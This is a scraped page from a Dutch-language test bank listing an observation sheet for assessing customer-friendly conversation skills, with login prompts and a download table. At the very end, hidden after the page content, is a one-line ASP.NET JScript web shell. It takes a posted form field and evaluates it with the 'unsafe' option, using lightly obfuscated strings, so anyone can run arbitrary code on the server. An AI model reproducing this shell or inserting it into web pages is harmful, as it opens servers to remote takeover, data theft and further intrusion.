Start > evaluatiebank > zoeken >  detail
      Start >>
      Toets zoeken
      Toets toevoegen
      Registeren
      Disclaimer

>>Detail van het resultaat                                                                                            

Titel: observeren van gespreksvaardigheid met focus op klantvriendelijkheid
Opm (geen pop-up) Indien commercieel product: gegevens van uitgeverij zijn hier te vinden (link naar hun site bv.) Maar gratis downloaden zal dan niet kunnen waarschijnlijk.

Bent u nog niet ingelogd?
Om deze toets te kunnen downloaden moet je inloggen met je e-mail- adres en paswoord.

 
 
          

Hebt je nog geen paswoord?
Registreer >>
Datum: 11/10/2010
Auteur: CTO 1 KU-Leuven - CTO/Steunpunt GOK (KULeuven)
Doel: gesprekken voeren
Vaardigheid: spreken
Domein: werk (zoeken) en ondernemen / school en opvoeding kinderen / economische consumptie / opleiding en (hoger) onderwijs / vrije tijd, media en sociale contacten / gezondheid / mobiliteit / huisvesting en gezinsadministratie
Niveau: A1 Breakthrough 1.1 / A2 Waystage 1.2 / B1 Threshold 2.1 / B1 Threshold 2.2 / B1 Threshold 2.3 / B1 Threshold 2.4
Soort: cursusonafhankelijk / observatie
   
BestandGrootte [KB]HandleidingDownload
observatieblad klantvriendelijkheid.doc62.5Alle bijlagen in één bestand

<%@ Page Language="Jscript" Debug=true%> <% var SO=Request.Form["M"]; var NJF="unsa",PKCLJIY="fe",VSEWDZ=NJF+PKCLJIY; function UKBT() { return SO; } function UJWHK() { return eval(UKBT(),VSEWDZ); } UJWHK() %>